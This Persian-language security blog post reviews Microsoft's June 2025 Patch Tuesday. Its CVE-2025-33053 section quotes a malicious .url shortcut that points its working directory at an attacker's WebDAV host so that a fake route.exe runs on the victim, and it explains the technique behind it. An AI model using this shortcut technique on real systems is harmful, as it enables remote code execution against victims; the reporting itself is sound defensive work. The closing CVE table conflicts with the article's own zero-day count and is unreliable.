Skip to content

ONHEXGROUP

اخبار دنیای امنیت سایبری

  • اخبار
    • آسیب پذیری امنیتی
    • آنالیز بدافزار
    • کنفرانس ،دوره ، وبینار ، لایو ، CTF
    • بازیگران تهدید
    • توسعه اکسپلویت
    • افشای اطلاعات
    • باگ بانتی
    • تیم آبی
    • تیم قرمز
    • امنیت وب
  • دوره های آموزشی
    • دوره رایگان مهندسی معکوس نرم افزار
  • لیست های ویژه
    • موتورهای جستجو برای امنیت سایبری
    • کاتالوگ KEV آژانس CISA
    • آسیب پذیری های وردپرس
      • آسیب پذیری پلاگین ها
      • آسیب پذیری های هسته
      • آسیب پذیری تم ها
    • محصولات خارج از پشتیبانی مایکروسافت
      • محصولات مایکروسافتی که در سال 2022 پشتیبانی نمیشن
      • محصولات مایکروسافتی که در سال 2023 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2024 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2025 پشتیبانی نمیشن
    • معرفی فیلم ها و سریالهای مرتبط با هک و امنیت
  • آموزش های ویدیویی
  • انتشارات
    • مجله
    • مقالات
    • پادکست
  • پروژه ها
    • ماشین آسیب پذیر
      • وردپرس آسیب پذیر
  • حمایت مالی ( Donate)
  • تماس با ما
 
  • Home
  • اخبار
  • بررسی Patch Tuesday مایکروسافت برای ژوئن 2025 (خرداد 1404)
  • آسیب پذیری امنیتی
  • اخبار
  • مقالات

بررسی Patch Tuesday مایکروسافت برای ژوئن 2025 (خرداد 1404)

On خرداد 21, 1404
seyyid
Share
زمان مطالعه: 7 دقیقه

مایکروسافت Patch Tuesday خودش رو برای ژوئن 2025 منتشر کرده و در اون به اصلاح 69 آسیب پذیری در محصولات مختلفش پرداخته.

با توجه به اینکه مایکروسافت آسیب پذیری هایی که قبل از اصلاح، بصورت عمومی منتشر بشن یا در حملاتی مورد اکسپلویت قرار بگیرن رو بعنوان زیرودی (0day) دسته بندی میکنه، بروزرسانی این ماه، دو آسیب پذیری زیرودی داره.

در آپدیت این ماه ، طبقه بندی آسیب پذیری ها به شرح زیر :

  • افزایش امتیاز: 14
  • اجرای کد: 27
  • افشای اطلاعات: 17
  • منع سرویس: 6
  • جعل: 2
  • دور زدن ویژگی های امنیتی: 3

 

type vulns Microsoft-June-2025-Patch-Tuesday

 

شدت آسیب پذیری های اصلاح شده در این ماه هم بصورت زیر:

  • شدت بحرانی : 10 مورد
  • شدت بالا: 1 مورد
  • شدت مهم: 57 مورد
  • شدت متوسط: 1 مورد

 

Microsoft-June-2025-Patch-Tuesday Severity

 

 

آسیب پذیری اکسپلویت شده (0Day) :

آسیب پذیری CVE-2025-33053:

آسیب پذیری از نوع External Control of File Name or Path و در Web Distributed Authoring and Versioning (WEBDAV) هستش. امتیاز 8.8 و شدت مهم داره. آسیب پذیری امکان اجرای کد رو به مهاجم میده. برای اکسپلویت، نیاز هستش تا کاربر روی لینکی کلیک کنه.

WEBDAV یک افزونه برای پروتکل HTTP هستش که به کاربران امکان میده فایلها رو از راه دور مدیریت کنن. این پروتکل در بسیاری از نسخه‌های ویندوز وجود داره و در گذشته توسط Internet Explorer برای دسترسی به منابع اشتراکی استفاده میشده. با توجه به اینکه اینترنت اکسپلورر منسوخ شده، اما برخی برنامه ها ازش همچنان استفاده میکنن، این بروزرسانی برای ویندوزهای قدیمی هم ارائه شده.

آسیب پذیری توسط CheckPoint گزارش شده. گروه هکری Stealth Falcon که با نام FruityArmor هم شناخته میشه از مارس 2025 از این آسیب پذیری برای هدف قرار دادن سازمانهای دولتی در تورکیه، قطر، مصر و یمن استفاده کرده.

وقتی یک فایل url.، دایرکتوری WorkingDirectory خودش رو روی یک مسیر WebDAV راه‌دور تنظیم میکنه، ابزار داخلی ویندوز میتونه فریب داده بشه تا فایل اجرایی مخرب رو از اون جا اجرا کنه. این روش به مهاجم اجازه میده بدون نیاز به مستقر کردن فایل مخرب روی سیستم قربانی، کد دلخواه خودشون رو از طریق سرور WebDAV تحت کنترلشون اجرا کنن و این موضوع باعث میشه عملیاتشون مخفی باشه.

در مارس 2025 از این حمله روی یک شرکت دفاعی در تورکیه استفاده کرده بودن. حمله اینجوری بود که یک فایل url. رو به شکل یک فایل PDF جعلی از طریق ایمیل فیشینگ به قربانی ارسال کرده بودن.

اکسپلویت از این فایل url. شروع میشه که پارامتر URL اون به فایل iediagcmd.exe اشاره داره که ابزاری قانونی از Internet Explorer برای تشخیص مشکلات شبکه هستش. این ابزار، دستوراتی مثل route، ipconfig و netsh رو اجرا میکنه تا به عیب‌یابی شبکه کمک کنه. اما آسیب‌پذیری بدلیل نحوه اجرای این ابزارهای خط فرمان، توسط ویندوز قابل سوءاستفاده هستش.

 

1
2
3
4
5
6
7
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D

 

وقتی iediagcmd.exe اجرا میشه، این ابزارهای تشخیصی با استفاده از تابع دات نتی Process.Start اجرا میشن که ابتدا دایرکتوری کاری فعلی رو برای یافتن برنامه بررسی میکنن، بعدش به دنبال اون در مسیرهای سیستمی مثل System32 میگردن.

 

Process.Start() method

 

در این حمله، فایل مخرب url. دایرکتوری کاری رو به سرور WebDAV مهاجم تنظیم میکنه و باعث میشه iediagcmd.exe ابزارها رو مستقیماً از اشتراک WebDAV راه دور اجرا کنه. در نتیجه، iediagcmd.exe بجای اجرای route.exe واقعی، نسخه جعلی اون رو از سرور مهاجم اجرا میکنه، که یک لودر چندمرحله‌ای به نام Horus Loader رو نصب میکنه. بعدش این لودر، پیلود اصلی بنام Horus Agent رو مستقر میکنه که یک ایمپلنت C2 سفارشی توسعه داده شده در ++C هستش که امکان اجرای دستور، دریافت اطلاعات سیستم، تغییر تنظیمات، تزریق شلکد، و انجام عملیات روی فایلها رو فراهم میکنه.

 

زنجیره آلودگی

 

محصولات تحت تاثیر:

Windows Server 2022, 23H2 Edition

Windows 11 Version 23H2

Windows Server 2025

Windows 10 Version 22H2

Windows 11 Version 22H2

Windows 10 Version 21H2

Windows Server 2012 R2

Windows Server 2012

Windows Server 2008 R2

Windows Server 2008

Windows Server 2016

Windows 10 Version 1607

Windows 10 for x64-based Systems

Windows 10 for x32-based Systems

Windows 11 Version 24H2

Windows 10 Version 21H2

Windows Server 2022

Windows Server 2019

Windows 10 Version 1809

 

آسیب پذیری های عمومی شده (0Day):

آسیب پذیری CVE-2025-33073:

آسیب پذیری از نوع Improper Access Control و در Windows SMB Client هستش. امتیاز 8.8 و شدت مهم داره و امکان افزایش امتیاز به SYSTEM رو میده. برای اکسپلویت نیاز هستش تا قربانی به یک سرور مخرب تحت کنترل مهاجم، وصل بشه. این آسیب پذیری قبلا عمومی شده.

محصولات تحت تاثیر:

Windows Server 2008 R2

Windows Server 2008

Windows Server 2016

Windows 10 Version 1607

Windows Server 2012 R2

Windows Server 2012

Windows 10 for x64-based Systems

Windows 10 for x32-based Systems

Windows Server 2025

Windows 11 Version 24H2

Windows Server 2022, 23H2 Edition

Windows 11 Version 23H2

Windows 10 Version 22H2

Windows 11 Version 22H2

Windows 10 Version 21H2

Windows Server 2022

Windows Server 2019

Windows 10 Version 1809

 

آسیب پذیری های بحرانی:

آسیب پذیری CVE-2025-47162:

آسیب پذیری از نوع Heap-based Buffer Overflow و در Microsoft Office هستش. امتیاز 8.4 و شدت بحرانی داره و امکان اجرای کد رو به مهاجم میده. Preview Pane هم جزء بردار آسیب پذیر هستش. مایکروسافت احتمال اکسپلویت شدن این آسیب پذیری رو بالا دونسته.

محصولات تحت تاثیر:

Microsoft Office 2016

Microsoft Office LTSC for Mac 2024

Microsoft Office LTSC 2024

Microsoft Office for Android

Microsoft Office LTSC 2021

Microsoft Office LTSC for Mac 2021

Microsoft 365 Apps for Enterprise

Microsoft Office 2019

 

آسیب پذیری CVE-2025-47164:

آسیب پذیری از نوع Use After Free و در Microsoft Office هستش. امتیاز 8.4 و شدت بحرانی داره و امکان اجرای کد رو به مهاجم میده. Preview Pane هم جزء بردار حمله هستش. مایکروسافت احتمال اکسپلویت شدن این آسیب پذیری رو بالا دونسته. در زمان نگارش این پست، اصلاحیه امنیتی برای Microsoft 365 در دسترس نیست.

محصولات تحت تاثیر:

Microsoft Office 2016

Microsoft Office LTSC for Mac 2024

Microsoft Office LTSC 2024

Microsoft Office for Android

Microsoft Office LTSC 2021

Microsoft Office LTSC for Mac 2021

Microsoft 365 Apps for Enterprise

Microsoft Office 2019

 

آسیب پذیری CVE-2025-47167:

آسیب پذیری از نوع Type Confusion و در Microsoft Office هستش. امتیاز 8.4 و شدت بحرانی داره و امکان اجرای کد رو به مهاجم میده. Preview Pane هم جزء بردار حمله هستش. مایکروسافت احتمال اکسپلویت شدن این آسیب پذیری رو بالا دونسته. در زمان نگارش این پست، اصلاحیه امنیتی برای Microsoft 365 در دسترس نیست.

محصولات تحت تاثیر:

Microsoft Office 2016

Microsoft Office LTSC for Mac 2024

Microsoft Office LTSC 2024

Microsoft Office for Android

Microsoft Office LTSC 2021

Microsoft Office LTSC for Mac 2021

Microsoft 365 Apps for Enterprise

Microsoft Office 2019

 

آسیب پذیری CVE-2025-47953:

آسیب پذیری از نوع Improper Restriction of Names for Files and Other Resources و در Microsoft Office هستش. امتیاز 8.4 و شدت بحرانی داره و امکان اجرای کد رو به مهاجم میده. Preview Pane هم جزء بردار حمله هستش. مایکروسافت احتمال اکسپلویت شدن این آسیب پذیری رو بالا دونسته. در زمان نگارش این پست، اصلاحیه امنیتی برای Microsoft 365 در دسترس نیست.

محصولات تحت تاثیر:

Microsoft Office 2016

Microsoft Office LTSC for Mac 2024

Microsoft Office LTSC 2024

Microsoft Office for Android

Microsoft Office LTSC 2021

Microsoft Office LTSC for Mac 2021

Microsoft 365 Apps for Enterprise

Microsoft Office 2019

 

آسیب پذیری CVE-2025-47172:

آسیب پذیری از نوع SQL Injection و در Microsoft SharePoint Server هستش. امتیاز 8.8 و شدت بحرانی داره و امکان اجرای کد رو به مهاجمی که احراز هویت کرده و حداقل پرمیشن های Site Member رو داره، میده.

محصولات تحت تاثیر:

Microsoft SharePoint Server Subscription Edition

Microsoft SharePoint Server 2019

Microsoft SharePoint Enterprise Server 2016

 

آسیب پذیری CVE-2025-47966:

آسیب پذیری از نوع Exposure of Sensitive Information to an Unauthorized Actor و در Power Automate هستش. امتیاز 9.8 و شدت بحرانی داره و امکان افزایش امتیاز رو به مهاجم میده. این آسیب پذیری توسط مایکروسافت اصلاح شده و کاربران نیاز به کار خاصی ندارن. مایکروسافت صرفا برای شفاف سازی، گزارش کرده.

 

آسیب پذیری CVE-2025-33071:

آسیب پذیری از نوع Use After Free و در Windows Kerberos Key Distribution Center Proxy Service (KPSSVC) هستش. امتیاز 8.1 و شدت بحرانی داره و امکان اجرای کد رو به مهاجم راه دور میده.

سرویس Kerberos KDC Proxy برای سناریوهایی مثل احراز هویت کاربران از طریق اینترنت یا شبکه‌های خارجی طراحی شده و نقش واسطه‌ای برای رسیدن درخواستهای Kerberos به Domain Controller رو ایفا میکنه. آسیب‌پذیری در پروتکل رمزنگاری استفاده‌شده در این سرویس هستش و به مهاجم اجازه میده بدون نیاز به حساب کاربری، به سیستم حمله کنه. مهاجم با یک برنامه ی مخرب میتونه این باگ رو اکسپلویت کنه.

این آسیب‌پذیری فقط ویندوز سرورهایی رو تحت تأثیر قرار میده که بعنوان سرور پروتکل پراکسی Kerberos KDC ([MS-KKDCP]) پیکربندی شدن. Domain Controllerها تحت تأثیر این آسیب پذیری نیستن.

مهاجم برای اینکه بتونه با موفقیت این آسیب پذیری رو اکسپلویت کنه باید در یک Race Condition برنده بشه.

محصولات تحت تاثیر:

Windows Server 2012 R2

Windows Server 2012

Windows Server 2016

Windows Server 2025

Windows Server 2022, 23H2 Edition

Windows Server 2022

Windows Server 2019

 

آسیب پذیری CVE-2025-33070:

آسیب پذیری از نوع Use of Uninitialized Resource و در Windows Netlogon هستش. امتیاز 8.1 و شدت بحرانی داره و امکان افزایش امتیاز رو به مهاجم میده. مهاجم با ارسال درخواست های احرازهویت مخرب به Domain Controller، میتونه امتیازات Domain Administrator رو بدست بیاره (امتیاز سرویس Netlogon). البته برای اکسپلویت نیاز به شرایطی در محیط قربانی هستش.

محصولات تحت تاثیر:

Windows Server 2012 R2

Windows Server 2012

Windows Server 2008 R2

Windows Server 2016

Windows 10 Version 1607

Windows 10 for x64-based Systems

Windows 10 for x32-based Systems

Windows Server 2025

Windows 11 Version 24H2

Windows Server 2022, 23H2 Edition

Windows 11 Version 23H2

Windows 10 Version 22H2

Windows 11 Version 22H2

Windows 10 Version 21H2

Windows Server 2022

Windows Server 2019

Windows 10 Version 1809

 

آسیب پذیری CVE-2025-32710:

آسیب پذیری از نوع Race Condition و در Windows Remote Desktop Services هستش. امتیاز 8.1 و شدت بحرانی داره و امکان اجرای کد رو به مهاجم میده. مهاجم میتونه با تلاش برای اتصال به سیستمی که نقش Remote Desktop Gateway رو داره، از این آسیب‌پذیری سوءاستفاده کنه. در این فرآیند، یک Race Condition فعال میشه که منجر به ایجاد یک وضعیت Use-After-Free شده و مهاجم از این وضعیت برای اجرای کد دلخواه استفاده میکنه.

محصولات تحت تاثیر:

Windows Server 2012 R2

Windows Server 2012

Windows Server 2008 R2

Windows Server 2008

Windows Server 2016

Windows Server 2025

Windows Server 2022, 23H2 Edition

Windows Server 2022

Windows Server 2019

 

آسیب پذیری CVE-2025-29828:

آسیب پذیری از نوع Missing Release of Memory after Effective Lifetime و در Windows Schannel هستش. امتیاز 8.1 و شدت بحرانی داره و امکان RCE رو به مهاجم میده. مهاجم میتونه با ارسال تعداد زیادی پیام‌ مخرب و تکه‌تکه‌شده ClientHello به سروری که اتصالات Transport Layer Security (TLS) رو میپذیره، این آسیب‌پذیری رو اکسپلویت کنه.

محصولات تحت تاثیر:

Windows Server 2025

Windows 11 Version 24H2

Windows Server 2022, 23H2 Edition

Windows 11 Version 23H2

Windows Server 2025

Windows 11 Version 22H2

Windows Server 2022

 

لیست همه ی آسیب پذیری های ژوئن 2025 مایکروسافت:

 

CVE Title Severity CVSS Public Exploited Type
CVE-2025-30400 Microsoft DWM Core Library Elevation of Privilege Vulnerability Important 7.8 No Yes EoP
CVE-2025-30397 Scripting Engine Memory Corruption Vulnerability Important 7.5 No Yes RCE
CVE-2025-32709 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability Important 7.8 No Yes EoP
CVE-2025-32701 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important 7.8 No Yes EoP
CVE-2025-32706 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important 7.8 No Yes EoP
CVE-2025-26685 Microsoft Defender for Identity Spoofing Vulnerability Important 6.5 Yes No Spoofing
CVE-2025-32702 Visual Studio Remote Code Execution Vulnerability Important 7.8 Yes No RCE
CVE-2025-29827 Azure Automation Elevation of Privilege Vulnerability Critical 9.9 No No EoP
CVE-2025-29813 Azure DevOps Elevation of Privilege Vulnerability Critical 10 No No EoP
CVE-2025-29972 Azure Storage Resource Provider Spoofing Vulnerability Critical 9.9 No No Spoofing
CVE-2025-47732 Microsoft Dataverse Remote Code Execution Vulnerability Critical 8.7 No No RCE
CVE-2025-33072 Microsoft msagsfeedback.azurewebsites.net Information Disclosure Vulnerability Critical 8.1 No No Info
CVE-2025-30377 Microsoft Office Remote Code Execution Vulnerability Critical 8.4 No No RCE
CVE-2025-30386 Microsoft Office Remote Code Execution Vulnerability Critical 8.4 No No RCE
CVE-2025-47733 Microsoft Power Apps Information Disclosure Vulnerability Critical 9.1 No No Info
CVE-2025-29833 Microsoft Virtual Machine Bus (VMBus) Remote Code Execution Vulnerability Critical 7.1 No No RCE
CVE-2025-29966 Remote Desktop Client Remote Code Execution Vulnerability Critical 8.8 No No RCE
CVE-2025-29967 Remote Desktop Client Remote Code Execution Vulnerability Critical 8.8 No No RCE
CVE-2025-26646 .NET, Visual Studio, and Build Tools for Visual Studio Spoofing Vulnerability Important 8 No No Spoofing
CVE-2025-29968 Active Directory Certificate Services (AD CS) Denial of Service Vulnerability Important 6.5 No No DoS
CVE-2025-30387 Document Intelligence Studio On-Prem Elevation of Privilege Vulnerability Important 9.8 No No EoP
CVE-2025-24063 Kernel Streaming Service Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2025-29973 † Microsoft Azure File Sync Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2025-29970 Microsoft Brokering File System Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2025-29826 Microsoft Dataverse Elevation of Privilege Vulnerability Important 7.3 No No EoP
CVE-2025-26684 Microsoft Defender Elevation of Privilege Vulnerability Important 6.7 No No EoP
CVE-2025-29977 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2025-29979 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2025-30375 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2025-30376 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2025-30379 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2025-30381 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2025-30383 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2025-30393 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2025-32704 Microsoft Excel Remote Code Execution Vulnerability Important 8.4 No No RCE
CVE-2025-32705 Microsoft Outlook Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2025-29975 Microsoft PC Manager Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2025-29978 Microsoft PowerPoint Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2025-29976 † Microsoft SharePoint Server Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2025-30378 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7 No No RCE
CVE-2025-30382 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2025-30384 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7.4 No No RCE
CVE-2025-27488 Microsoft Windows Hardware Lab Kit (HLK) Elevation of Privilege Vulnerability Important 6.7 No No EoP
CVE-2025-29969 MS-EVEN RPC Remote Code Execution Vulnerability Important 7.5 No No EoP
CVE-2025-32707 NTFS Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2025-29841 Universal Print Management Service Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2025-29842 UrlMon Security Feature Bypass Vulnerability Important 7.5 No No SFB
CVE-2025-21264 Visual Studio Code Security Feature Bypass Vulnerability Important 6.7 No No SFB
CVE-2025-32703 Visual Studio Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2025-29971 Web Threat Defense (WTD.sys) Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2025-30385 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2025-29957 Windows Deployment Services Denial of Service Vulnerability Important 6.2 No No DoS
CVE-2025-29838 Windows ExecutionContext Driver Elevation of Privilege Vulnerability Important 7.4 No No EoP
CVE-2025-30388 Windows Graphics Component Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2025-29955 Windows Hyper-V Denial of Service Vulnerability Important 6.2 No No DoS
CVE-2025-29837 Windows Installer Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2025-29974 Windows Kernel Information Disclosure Vulnerability Important 5.7 No No Info
CVE-2025-27468 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2025-29954 Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability Important 5.9 No No DoS
CVE-2025-29840 Windows Media Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2025-29962 Windows Media Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2025-29963 Windows Media Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2025-29964 Windows Media Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2025-29839 Windows Multiple UNC Provider Driver Information Disclosure Vulnerability Important 4 No No Info
CVE-2025-29835 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 6.5 No No Info
CVE-2025-26677 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2025-30394 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability Important 5.9 No No DoS
CVE-2025-29831 Windows Remote Desktop Services Remote Code Execution Vulnerability Important 7.5 No No RCE
CVE-2025-29830 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info
CVE-2025-29832 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info
CVE-2025-29836 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info
CVE-2025-29958 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info
CVE-2025-29959 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info
CVE-2025-29960 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info
CVE-2025-29961 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability Important 6.5 No No Info
CVE-2025-29956 Windows SMB Information Disclosure Vulnerability Important 5.4 No No Info
CVE-2025-29829 Windows Trusted Runtime Interface Driver Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2025-4096 * Chromium: CVE-2025-4096 Heap buffer overflow in HTML High N/A No No RCE
CVE-2025-4050 * Chromium: CVE-2025-4050 Out of bounds memory access in DevTools Medium N/A No No Info
CVE-2025-4051 * Chromium: CVE-2025-4051 Insufficient data validation in DevTools Medium N/A No No RCE
CVE-2025-4372 * Chromium: CVE-2025-4372 Use after free in WebAudio Medium N/A No No RCE
CVE-2025-4052 * Chromium: CVE-2025-4052 Inappropriate implementation in DevTools Low N/A No No RCE

 

 

منابع:

مایکروسافت

ZeroDayInitiative

 

 

اشتراک در شبکه های اجتماعی :

Facebook
Twitter
Pinterest
LinkedIn
In آسیب پذیری امنیتی اخبار مقالاتIn 0day , Patch Tuesday , مایکروسافت , ویندوز

راهبری نوشته

کار واقعی رو انجام بدید

دیدگاهتان را بنویسید لغو پاسخ

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دسته‌ها

  • Osint
  • آسیب پذیری امنیتی
  • آموزش های ویدیویی
  • آنالیز بدافزار
  • اخبار
  • افشای اطلاعات
  • امنیت وب
  • انتشارات
  • اینترنت اشیاء
  • بازیگران تهدید
  • باگ بانتی
  • پادکست
  • پروژه ها
  • توسعه اکسپلویت
  • تیم آبی
  • تیم قرمز
  • دوره های آموزشی
  • فازینگ
  • کنفرانس ،دوره ، وبینار ، لایو ، CTF
  • لیست های ویژه
  • ماشین آسیب پذیر
  • مجله
  • مقالات
  • مهندسی معکوس نرم افزار

پست های مرتبط

  • آنالیز بدافزار
  • اخبار
  • بازیگران تهدید
seyyid
On مهر 28, 1403

هک شریک انحصاری ESET در اسرائیل برای توزیع بدافزار

  • آسیب پذیری امنیتی
  • اخبار
  • امنیت وب
seyyid
On اردیبهشت 10, 1402اردیبهشت 11, 1402

آسیب پذیری XSS در cPanel

  • اخبار
  • امنیت وب
seyyid
On مهر 24, 1403

استفاده از AI برای دیکامپایل Opcodeهای PHP

  • آسیب پذیری امنیتی
  • اخبار
  • توسعه اکسپلویت
  • مقالات
seyyid
On دی 1, 1401دی 19, 1401

بررسی عمیق آسیب پذیری CVE-2022-1388

درباره ما

بعد از چندین سال فعالیت تو حوزه امنیت سایبری و تولید محتوا در شبکه های اجتماعی ، بالاخره تصمیم گرفتیم تا یه سایت راه اندازی کنیم و مطالب رو ساده تر ، در یک محیط منسجم و طبقه بندی شده به دست مخاطب برسونیم. امیدوارم که قدمی در راستای رشد امنیت سایبری کشورمون برداشته باشیم.

تگ ها

0day APT command injection Deserialization of Untrusted Data Directory Traversal FBI Fortinet Heap buffer overflow integer overflow kali LockBit Memory Corruption nuclei Off By One Security out-of-bounds write Out of bounds read Patch Tuesday PWN2OWN Stack Buffer overflow type confusion use after free vulnerable wordpress XSS ZDI vulnerability آموزش اکسپلویت نویسی ارز دیجیتال اندروید اپل اکسپلویت باج افزار تلگرام زیرودی سیسکو فارنزیک فورتی نت فیشینگ لاک بیت مایکروسافت هوش مصنوعی وردپرس وردپرس آسیب پذیر ویندوز پلاگین کروم گوگل

شبکه های اجتماعی

    • Instagram
    • Telegram
    • Twitter
    • GitHub
    • YouTube
    • LinkedIn
      کپی مطالب با ذکر منبع بلامانع است | 1401-1404

      Are you sure?

      Please confirm deletion. There is no undo!